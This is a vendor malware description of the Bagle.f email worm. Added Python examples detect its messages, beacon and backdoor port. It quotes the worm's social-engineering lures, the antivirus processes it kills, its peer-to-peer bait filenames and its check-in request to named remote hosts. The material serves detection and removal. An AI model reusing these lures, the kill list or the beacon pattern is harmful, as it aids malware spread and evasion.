W32/Bagle.f@MM

Type: Virus
SubType: E-mail worm
Discovery Date: 02/29/2004
Length: Varies
Minimum DAT: 4330 (02/29/2004)
Updated DAT: 4331 (03/02/2004)
Minimum Engine: 5.1.00
Description Added: 02/29/2004
Description Modified: 02/29/2004 6:43 PM (PT)
Risk Assessment: Corporate User - Low; Home User - Low

Characteristics

This is a mass-mailing worm with the following characteristics:

  • contains its own SMTP engine to construct outgoing messages
  • harvests email addresses from the victim machine
  • the From: address of messages is spoofed
  • attachment can be a password-protected zip file, with the password included in the message body. Note: detection for the password protected ZIP is included within the 4330 DAT file.
  • contains a remote access component (notification is sent to hacker)
  • copies itself to folders that have the phrase "shar" in the name (typically the shared folders of common peer-to-peer applications such as KaZaa, Bearshare, Limewire, etc.)

Messages are constructed as follows:

From : (address is spoofed)
Subject :

  • ^_^ meay-meay!
  • ^_^ mew-mew (-:
  • Aline
  • Anna
  • Audra
  • Bad girl
  • Barbi
  • beautiful
  • Caitie
  • caroline
  • ello! =))
  • Fotograf
  • Gallery photos
  • groom
  • Hey, dude, it's me ^_^ :P
  • Hey, ya! =))
  • Hi! :-)
  • Hokki =)
  • Jammie
  • Juli
  • Julie
  • kate
  • Katrina
  • Kelley
  • kleopatra
  • Lisa
  • Mandy
  • Mary
  • Mary-Anne
  • My beautiful person
  • My Name is Frenk
  • My photoalbum
  • My photos
  • Myphotos
  • Photoalbum
  • rebecca
  • Rena
  • Sara
  • stacy
  • Tammy
  • Wau... beautiful (-:
  • Weah, hello! :-)
  • Weeeeee! ;)))

Body (one of the following):

  • Argh, i don't like the plaintext :)
  • Fell free to chat with me I accept all ages. Don''''t worry I don''''t bite........hope to hear from you soon!
  • If you are going to make me cry, at least be there to wipe away the tears *Right now the worst thing for you to tell me that I can find someone better than you, especially when you are all I want
  • You don’t know what you’ve got till it’s gone *You hurt me more than I deserve, how can you be so cruel? I love you more than you deserve, how can I be such a fool?
  • I sit with elders of a gentle race, whose world is seldom seen.Who sit and talk of days for which they wait, when all will be revealed. These are song lyrics.
  • I'm a social butterfly and a natural flirt. Very hard to get my complete attention. Very open and will answer almost anything. But please don't piss me off. I can be sweet and cuddly or a whatever mood I am in that day so everyday
  • Love the outdoors, literature, writing, and athletics
  • When The Trust is Gone So Is The Love That Fades Like the Rain Washing Away All The Sorrows Of Yesterday Why I Ask Myself Must It End Like This Tomorrow, I Tell Myself, I'll Be Okay For Now, I'll Just Live In The Memories Of Our Life Together
  • I enjoy clean conversations but am open to conversing with women and men with little ones as well. I am very open-minded. All authorization requests will be denied if I don't receive messages and get to know you first.
  • I love camping, dirt track racing, going for walks, and I have 2 cats - HotRod and Deebo (named from the movie 'Friday' and he lives up to it!). Life is ever changing, never always easy...
  • i love to chat to just about anyone!!
  • If I'm online, it problably means I'm pretty bored....so feel free to message me and say hi or whatever else comes to mind at the moment.
  • Hey people whats goin on? If there is anything you want to know about me ask me... I am pretty easygoing I won't bite....not at first anywayz hahaa.....one thing I will say on here tho I am not into the Cyber thing so don't even ask.....Ciao...
  • Hi! My name is Shreya and I am a goof off!!! So, If you love the outdoors, travelling, books, music, movies, laffing, teasing and/or can poke fun at yourself... please come a hollerin'!!
  • I love to dance, read poetry, make people laugh, and hug as many people a day as i can.
  • Single Mom of 3, Full time college student, Graduate in December with an Associates of Applied Science in Computer Information Systems Love the internet.
  • My hobbies include crochet, sewing, painting lead figures and playing AD&D. Favorite activities include fishing and camping. I love cats, unicorns(go figure), and fantasy in general.
  • I like to be in a company of smart, delicate, and with a good sense of humor people. I am Bulgarian, currently getting my Master's in International Business in USA. Favorite actor: Michael Dudikoff
  • i'm tall and skiny I'm studying in Pharm. D program in FL. i like music, movie, dancing, sports, SCUBA diving, traveling and make a lot friends.
  • Nice friends, nice men, nice sex and feeling great. I don't mind the odd bout of cybersex as I love to use my imagination when I masterbate.
  • Hey, guys! by the way, I have no problems with my sexual life, so it's absolutly useless try to have icq sex or things like that. Thanks
  • I'm an open minded person and enjoy chatting w/ other people. I'm free and willing to chat about anything. So feel free to Imed me if you wanna chat.
  • I love meeting new people and making new friends. I am a Mary Kay Beauty Consultant. I am married to a wonderful man. We have no children, exept for a minature schnauzer that thinks he is a child. Looking forward to meeting you.
  • I am from Taiwan but I study in Camden, New Jersey now. I like to know people from different places .
  • I'm married and I stay at home. And I don't do cyber sex so leave me the f**k alone
  • Looking forward for a response :P

If the attachment is a password protected zip, one of the following lines will be included in the body:

  • archive password: %password%
  • password: %password%
  • pass: %password%

Attachment (may have .exe, .scr, or .zip extension):

  • Aline
  • Anna
  • Audra
  • Bad girl
  • Barbi
  • Caitie
  • caroline
  • Gallery
  • It_I
  • Jammie
  • Juli
  • Julie
  • kate
  • Katrina
  • Katrina
  • Kelley
  • kleopatra
  • Lisa
  • Mandy
  • Mary
  • Mary-Anne
  • myfotos
  • Photoalbum
  • Photomontage
  • Picture
  • rebecca
  • Rena
  • Sara
  • stacy
  • Tammy
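The subject, body and attachment lists above are what a mail gateway has to work with before signatures catch up. The following is an added example (not McAfee's code and not part of the original description) of a filter that scores an outgoing message against those lists: a first-name subject on its own is far too weak, so the check only flags a message when the worm's attachment naming (a listed stem with an .exe, .scr or .zip extension) coincides with a listed subject or with the "password: ..." body line that accompanies the password-protected ZIP variant. The sample messages are constructed; addresses such as victim@example.org are placeholders.

```python
import re
from email.message import EmailMessage

# Indicator lists quoted from the description above; "|"-joined only to keep the block compact.
SUBJECTS = set(
    "^_^ meay-meay!|^_^ mew-mew (-:|Aline|Anna|Audra|Bad girl|Barbi|beautiful|Caitie|caroline|"
    "ello! =))|Fotograf|Gallery photos|groom|Hey, dude, it's me ^_^ :P|Hey, ya! =))|Hi! :-)|"
    "Hokki =)|Jammie|Juli|Julie|kate|Katrina|Kelley|kleopatra|Lisa|Mandy|Mary|Mary-Anne|"
    "My beautiful person|My Name is Frenk|My photoalbum|My photos|Myphotos|Photoalbum|rebecca|"
    "Rena|Sara|stacy|Tammy|Wau... beautiful (-:|Weah, hello! :-)|Weeeeee! ;)))".split("|")
)
ATTACHMENT_STEMS = set(
    "Aline|Anna|Audra|Bad girl|Barbi|Caitie|caroline|Gallery|It_I|Jammie|Juli|Julie|kate|Katrina|"
    "Kelley|kleopatra|Lisa|Mandy|Mary|Mary-Anne|myfotos|Photoalbum|Photomontage|Picture|rebecca|"
    "Rena|Sara|stacy|Tammy".split("|")
)
ATTACHMENT_EXTS = {".exe", ".scr", ".zip"}
# "archive password: X", "password: X" or "pass: X" on a line of its own in the body
PASSWORD_LINE = re.compile(r"^\s*(?:archive password|password|pass):\s*\S+\s*$",
                           re.IGNORECASE | re.MULTILINE)


def bagle_f_indicators(msg: EmailMessage) -> list[tuple[str, str]]:
    """Return (indicator-kind, detail) pairs for every Bagle.f message trait found in msg."""
    hits = []
    subject = (msg["Subject"] or "").strip()
    if subject in SUBJECTS:
        hits.append(("subject", subject))
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content() if body is not None else ""
    pw = PASSWORD_LINE.search(text)
    if pw:
        hits.append(("password-line", pw.group(0).strip()))
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        stem, _, ext = name.rpartition(".")
        ext = "." + ext.lower()
        if stem in ATTACHMENT_STEMS and ext in ATTACHMENT_EXTS:
            hits.append(("attachment-name", name))
        if ext == ".zip" and pw:                 # the password-protected ZIP variant
            hits.append(("password-zip", name))
    return hits


def is_suspected_bagle_f(msg: EmailMessage) -> bool:
    """Flag only when the worm's attachment naming is backed by a second trait."""
    kinds = {kind for kind, _ in bagle_f_indicators(msg)}
    return "attachment-name" in kinds and bool(kinds & {"subject", "password-zip"})


def build_sample(subject: str, body: str, attachment_name: str, payload: bytes) -> EmailMessage:
    """Construct a test message (sender/recipient are placeholders, not real addresses)."""
    msg = EmailMessage()
    msg["From"] = "spoofed@example.com"      # the worm uses a harvested address here
    msg["To"] = "victim@example.org"
    msg["Subject"] = subject
    msg.set_content(body)
    subtype = "zip" if attachment_name.lower().endswith(".zip") else "octet-stream"
    msg.add_attachment(payload, maintype="application", subtype=subtype, filename=attachment_name)
    return msg


if __name__ == "__main__":
    samples = [
        build_sample("Hi! :-)", "Argh, i don't like the plaintext :)", "Anna.exe", b"MZ"),
        build_sample("Photoalbum", "My photos\npassword: 12345\n", "Photoalbum.zip", b"PK"),
        build_sample("Q3 report", "See attached.\npassword: swordfish\n", "report.zip", b"PK"),
        build_sample("Anna", "Agenda for Monday attached.", "agenda.pdf", b"%PDF"),
    ]
    for m in samples:
        print(m["Subject"], "->", is_suspected_bagle_f(m), bagle_f_indicators(m))
```

The third sample (a legitimate password-protected archive) shows why the password line is not enough by itself: it only counts when paired with the worm's attachment stems.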

The worm uses a folder icon (shown as an image in the original description) so that the executable appears to be a folder.

Like its predecessors, this worm checks the system date. If it is the 25th March 2005 or later, the worm simply exits and does not propagate.

The virus copies itself into the Windows System directory as i1ru54n4.exe, for example:

C:\WINNT\SYSTEM32\i1ru54n4.exe

It also creates other files in this directory to perform its functions:

  • go54o.exe (24,064 bytes) - DLL to perform mailing
  • ii5nj4.exe (1,536 bytes) - DLL loader
  • i1ru54n4.exeopen (~16KB) - file to be sent via email

The following Registry key is added to hook system startup:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "rate.exe" = C:\WINNT\SYSTEM32\i1ru74n4.exe

Additionally, the following Registry key is added:

  • HKEY_CURRENT_USER\Software\winword "frun"

A mutex called "imain_mutex" is created to ensure only one instance of the worm is running at a time.

This worm attempts to terminate the processes of security programs with the following filenames:

  • ATUPDATER.EXE
  • ATUPDATER.EXE
  • AUPDATE.EXE
  • AUTODOWN.EXE
  • AUTOTRACE.EXE
  • AUTOUPDATE.EXE
  • AVLTMAIN.EXE
  • AVPUPD.EXE
  • AVWUPD32.EXE
  • AVXQUAR.EXE
  • CFIAUDIT.EXE
  • DRWEBUPW.EXE
  • ICSSUPPNT.EXE
  • ICSUPP95.EXE
  • LUALL.EXE
  • MCUPDATE.EXE
  • NUPGRADE.EXE
  • NUPGRADE.EXE
  • OUTPOST.EXE
  • UPDATE.EXE

Symptoms

  • Port 2745 (TCP) open on the victim machine
  • Outgoing messages matching the described characteristics
  • Files/Registry keys as described

Method of Infection

Mail Propagation

This virus constructs messages using its own SMTP engine. Target email addresses are harvested from files with the following extensions on the victim machine:

  • .adb
  • .asp
  • .cfg
  • .dbx
  • .eml
  • .htm
  • .mdx
  • .mmf
  • .nch
  • .ods
  • .php
  • .pl
  • .sht
  • .tbb
  • .txt
  • .wab
  • .xml

The virus spoofs the sender address by using a harvested address in the From: field.

The virus avoids sending itself to addresses containing the following:

  • @avp.
  • @hotmail.com
  • @microsoft
  • @msn.com
  • local
  • noreply
  • postmaster@
  • root@

Remote Access Component

The virus listens on TCP port 2745 for remote connections. It attempts to notify the author that the infected system is ready to accept commands by requesting a PHP script on each of the following websites. At the time of this writing this script is inaccessible. The websites are contacted every 27.8 hours.

http://postertog.de/scr.php
http://www.gfotxt.net/scr.php
http://www.maiklibis.de/scr.php

The format of the HTTP request sent to the above websites is:

GET /scr.php?p=2745 HTTP/1.1
User_Agent: beagle2_proclivity
Host: postertog.de

Note: The value of the Host field changes depending on which website is being contacted.
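The beacon request above and the listening port listed under Symptoms are the two network traces a defender can look for. The following is an added example (not McAfee's code and not part of the original description) that parses a raw HTTP request and scores it against the three traits shown: the /scr.php?p=2745 check-in, the misspelt User_Agent header (a browser never sends an underscore there) and the three notification hosts. A second helper scans netstat -an style output for a listener on TCP 2745. The request bytes and netstat lines below are constructed for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

BAGLE_F_BEACON_HOSTS = {"postertog.de", "www.gfotxt.net", "www.maiklibis.de"}
BAGLE_F_USER_AGENT = "beagle2_proclivity"
BAGLE_F_BACKDOOR_PORT = 2745


def parse_http_request(raw: bytes) -> tuple[str, str, str, dict[str, str]]:
    """Split a raw HTTP/1.x request into (method, target, version, lower-cased headers)."""
    head = re.split(r"\r?\n\r?\n", raw.decode("latin-1"), maxsplit=1)[0]
    lines = re.split(r"\r?\n", head)
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return method, target, version, headers


def beacon_indicators(raw: bytes) -> list[str]:
    """Return the Bagle.f notification traits present in one HTTP request."""
    method, target, _, headers = parse_http_request(raw)
    reasons = []
    url = urlsplit(target)
    if method == "GET" and url.path.endswith("/scr.php"):
        if parse_qs(url.query).get("p") == [str(BAGLE_F_BACKDOOR_PORT)]:
            reasons.append("scr.php check-in advertising port 2745")
    # the worm's header name is User_Agent, not User-Agent, so the key is "user_agent"
    if headers.get("user_agent") == BAGLE_F_USER_AGENT:
        reasons.append("User_Agent beagle2_proclivity")
    if headers.get("host", "").lower() in BAGLE_F_BEACON_HOSTS:
        reasons.append("known notification host")
    return reasons


def is_bagle_f_beacon(raw: bytes) -> bool:
    """Two independent traits are required; the host alone could be an unrelated visit."""
    return len(beacon_indicators(raw)) >= 2


NETSTAT_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s*$", re.IGNORECASE)


def listening_on_port(netstat_output: str, port: int = BAGLE_F_BACKDOOR_PORT) -> list[str]:
    """Return local sockets from `netstat -an` style output that listen on the given TCP port."""
    found = []
    for line in netstat_output.splitlines():
        m = NETSTAT_LINE.match(line)
        if m and int(m.group(2)) == port:
            found.append(f"{m.group(1)}:{m.group(2)}")
    return found


# Constructed samples: the worm's request as documented, a benign request, and a netstat excerpt.
BEACON = b"GET /scr.php?p=2745 HTTP/1.1\r\nUser_Agent: beagle2_proclivity\r\nHost: postertog.de\r\n\r\n"
BENIGN = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
NETSTAT_SAMPLE = """
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2745           0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1050       10.0.0.8:80            ESTABLISHED
"""

if __name__ == "__main__":
    print("beacon:", is_bagle_f_beacon(BEACON), beacon_indicators(BEACON))
    print("benign:", is_bagle_f_beacon(BENIGN), beacon_indicators(BENIGN))
    print("listeners on 2745:", listening_on_port(NETSTAT_SAMPLE))
```

Because the page notes that the notification script was already unreachable, the outbound request itself (not the reply) is the observable: an IDS or proxy rule keyed on the User_Agent value or the p=2745 query is what identifies an infected host.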

Peer To Peer Propagation

Files with the following names are created in folders whose names contain the phrase "shar":

  • ACDSee 9.exe
  • Adobe Photoshop 9 full.exe
  • Ahead Nero 7.exe
  • Matrix 3 Revolution English Subtitles.exe
  • Microsoft Office 2003 Crack, Working!.exe
  • Microsoft Office XP working Crack, Keygen.exe
  • Microsoft Windows XP, WinXP Crack, working Keygen.exe
  • Opera 8 New!.exe
  • Porno pics arhive, xxx.exe
  • Porno Screensaver.scr
  • Porno, sex, oral, anal cool, awesome!!.exe
  • Serials.txt.exe
  • WinAmp 5 Pro Keygen Crack Update.exe
  • WinAmp 6 New!.exe
  • Windown Longhorn Beta Leak.exe
  • Windows Sourcecode update.doc.exe
  • XXX hardcore images.exe

Removal

All Users: Use the specified engine and DAT files for detection and removal.

Additional Windows ME/XP removal considerations

Manual Removal Instructions
To remove this virus "by hand", follow these steps:

  1. Reboot the system into Safe Mode (hit the F8 key as soon as the Starting Windows text is displayed, then choose Safe Mode).
  2. Delete the following files from your WINDOWS System directory (typically C:\Windows\System or C:\Winnt\System32):
    go54o.exe
    i1ru54n4.exe
    ii5nj4.exe
    i1ru54n4.exeopen
  3. Edit the registry
    • Delete the "rate.exe" value from
      • HKEY_CURRENT_USER\Software\Microsoft\
        Windows\CurrentVersion\Run
    • Delete the key
      • HKEY_CURRENT_USER\Software\winword
  4. Reboot the system into Default Mode

Sniffer Customers: Filters have been developed that will look for Bagle traffic [Sniffer Distributed 4.1/4.2/4.3, Sniffer Portable 4.7/4.7.5, and Netasyst].

Variants

N/A

Overview

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.
